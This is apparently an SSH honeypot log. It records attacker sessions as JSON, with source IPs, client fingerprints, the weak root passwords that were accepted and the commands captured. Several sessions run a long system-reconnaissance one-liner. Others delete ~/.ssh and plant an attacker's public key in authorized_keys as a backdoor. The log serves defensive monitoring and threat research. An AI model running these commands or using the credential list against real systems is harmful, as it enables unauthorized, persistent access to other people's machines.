Credential acceptance event recorded. Target authentication: root / 123456
Remote entity achieved interactive shell state. Command sequence (9 executed):
{
"id": "598c0a7eb94f",
"src_ip": "195.178.110.228",
"start_time": "2026-06-30T01:09:28.973598Z",
"end_time": "2026-06-30T01:09:33.010731Z",
"duration": "4.0",
"version": "SSH-2.0-Go",
"hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "123456"
},
"commands": [
"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"uname -s -v -n -m 2 > /dev/null",
"/bin/uname -s -v -n -m 2 > /dev/null",
"/usr/bin/uname -s -v -n -m 2 > /dev/null",
"busybox uname -s -v -n -m 2 > /dev/null",
"( [ -f /proc/version ]",
"[ -f /proc/version ]",
"head -1 /proc/version | cut -d -f1",
"[ -f /etc/os-release ]"
],
"detailed_commands": [
{
"cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"failed": false,
"error": null
},
{
"cmd": "uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
"failed": true,
"error": "Command not found: /usr/bin/uname -s -v -n -m"
},
{
"cmd": "busybox uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "( [ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "[ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "head -1 /proc/version | cut -d -f1",
"failed": false,
"error": null
},
{
"cmd": "[ -f /etc/os-release ]",
"failed": false,
"error": null
}
],
"failed_commands": [
"/usr/bin/uname -s -v -n -m"
],
"score": 200,
"tags": [
"COMMANDS RUN",
"RECONNAISSANCE",
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "7200c945f80e",
"src_ip": "47.245.98.98",
"start_time": "2026-06-30T01:09:27.328901Z",
"end_time": "2026-06-30T01:09:29.442062Z",
"duration": "2.1",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: ftpuser / abcd1234
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "8f2d1496c1ff",
"src_ip": "47.245.98.98",
"start_time": "2026-06-30T01:09:24.840207Z",
"end_time": "2026-06-30T01:09:30.771806Z",
"duration": "5.9",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": "f555226df1963d1d3c09daf865abdc9a",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "ftpuser",
"pass": "abcd1234"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 12345
Remote entity achieved interactive shell state. Command sequence (9 executed):
{
"id": "b40e4654c003",
"src_ip": "195.178.110.228",
"start_time": "2026-06-30T01:07:23.332040Z",
"end_time": "2026-06-30T01:07:26.316578Z",
"duration": "3.0",
"version": "SSH-2.0-Go",
"hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "12345"
},
"commands": [
"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"uname -s -v -n -m 2 > /dev/null",
"/bin/uname -s -v -n -m 2 > /dev/null",
"/usr/bin/uname -s -v -n -m 2 > /dev/null",
"busybox uname -s -v -n -m 2 > /dev/null",
"( [ -f /proc/version ]",
"[ -f /proc/version ]",
"head -1 /proc/version | cut -d -f1",
"[ -f /etc/os-release ]"
],
"detailed_commands": [
{
"cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"failed": false,
"error": null
},
{
"cmd": "uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
"failed": true,
"error": "Command not found: /usr/bin/uname -s -v -n -m"
},
{
"cmd": "busybox uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "( [ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "[ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "head -1 /proc/version | cut -d -f1",
"failed": false,
"error": null
},
{
"cmd": "[ -f /etc/os-release ]",
"failed": false,
"error": null
}
],
"failed_commands": [
"/usr/bin/uname -s -v -n -m"
],
"score": 200,
"tags": [
"COMMANDS RUN",
"RECONNAISSANCE",
"SUCCESSFUL LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "79965e6a9103",
"src_ip": "45.148.10.157",
"start_time": "2026-06-30T01:06:39.787697Z",
"end_time": "2026-06-30T01:06:40.538139Z",
"duration": "0.7",
"version": "SSH-2.0-PUTTY",
"hassh": "5bd26477da5440a6187bd3f1b39a429c",
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Credential acceptance event recorded. Target authentication: root / 1234
Remote entity achieved interactive shell state. Command sequence (9 executed):
{
"id": "38f73e573489",
"src_ip": "195.178.110.228",
"start_time": "2026-06-30T01:05:20.048530Z",
"end_time": "2026-06-30T01:05:23.535129Z",
"duration": "3.5",
"version": "SSH-2.0-Go",
"hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "1234"
},
"commands": [
"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"uname -s -v -n -m 2 > /dev/null",
"/bin/uname -s -v -n -m 2 > /dev/null",
"/usr/bin/uname -s -v -n -m 2 > /dev/null",
"busybox uname -s -v -n -m 2 > /dev/null",
"( [ -f /proc/version ]",
"[ -f /proc/version ]",
"head -1 /proc/version | cut -d -f1",
"[ -f /etc/os-release ]"
],
"detailed_commands": [
{
"cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"failed": false,
"error": null
},
{
"cmd": "uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
"failed": true,
"error": "Command not found: /usr/bin/uname -s -v -n -m"
},
{
"cmd": "busybox uname -s -v -n -m 2 > /dev/null",
"failed": false,
"error": null
},
{
"cmd": "( [ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "[ -f /proc/version ]",
"failed": false,
"error": null
},
{
"cmd": "head -1 /proc/version | cut -d -f1",
"failed": false,
"error": null
},
{
"cmd": "[ -f /etc/os-release ]",
"failed": false,
"error": null
}
],
"failed_commands": [
"/usr/bin/uname -s -v -n -m"
],
"score": 200,
"tags": [
"COMMANDS RUN",
"RECONNAISSANCE",
"SUCCESSFUL LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / 3245gs5662d34
{
"id": "ccebbf3ee63d",
"src_ip": "117.200.93.93",
"start_time": "2026-06-30T01:04:49.154987Z",
"end_time": "2026-06-30T01:04:50.964142Z",
"duration": "1.8",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "3245gs5662d34"
},
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 50,
"tags": [
"SUCCESSFUL LOGIN"
]
}Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34
{
"id": "2f038ba3ee92",
"src_ip": "117.200.93.93",
"start_time": "2026-06-30T01:04:46.016411Z",
"end_time": "2026-06-30T01:04:48.863858Z",
"duration": "2.8",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [
{
"user": "345gs5662d34",
"pass": "345gs5662d34"
}
],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": [
"FAILED LOGIN"
]
}Credential acceptance event recorded. Target authentication: root / Q!W@E#R$q1w2e3r4
Remote entity achieved interactive shell state. Command sequence (2 executed):
{
"id": "56934711768e",
"src_ip": "117.200.93.93",
"start_time": "2026-06-30T01:04:42.298031Z",
"end_time": "2026-06-30T01:04:50.961113Z",
"duration": "8.7",
"version": "SSH-2.0-libssh_0.11.1",
"hassh": "03a80b21afa810682a776a7d42e5e6fb",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "Q!W@E#R$q1w2e3r4"
},
"commands": [
"cd ~; chattr -ia .ssh; lockr -ia .ssh",
"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
],
"detailed_commands": [
{
"cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
"failed": true,
"error": "Command not found: lockr -ia .ssh"
},
{
"cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
"failed": false,
"error": null
}
],
"failed_commands": [
"lockr -ia .ssh"
],
"score": 80,
"tags": [
"COMMANDS RUN",
"SUCCESSFUL LOGIN"
]
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "f099d962eb9b",
"src_ip": "180.76.51.13",
"start_time": "2026-06-30T01:03:56.260716Z",
"end_time": "2026-06-30T01:05:56.274922Z",
"duration": "120.0",
"version": "SSH-2.0-libssh_0.9.6",
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 10,
"tags": []
}Credential acceptance event recorded. Target authentication: root / 123123
Remote entity achieved interactive shell state. Command sequence (9 executed):
{
"id": "188760396a7b",
"src_ip": "195.178.110.228",
"start_time": "2026-06-30T01:03:10.684999Z",
"end_time": "2026-06-30T01:03:13.594190Z",
"duration": "2.9",
"version": "SSH-2.0-Go",
"hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
"attempts": [],
"success_login": true,
"success_credential": {
"user": "root",
"pass": "123123"
},
"commands": [
"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
"uname -s -v -n -m 2 > /dev/null",
"/bin/uname -s -v -n -m 2 > /dev/null",
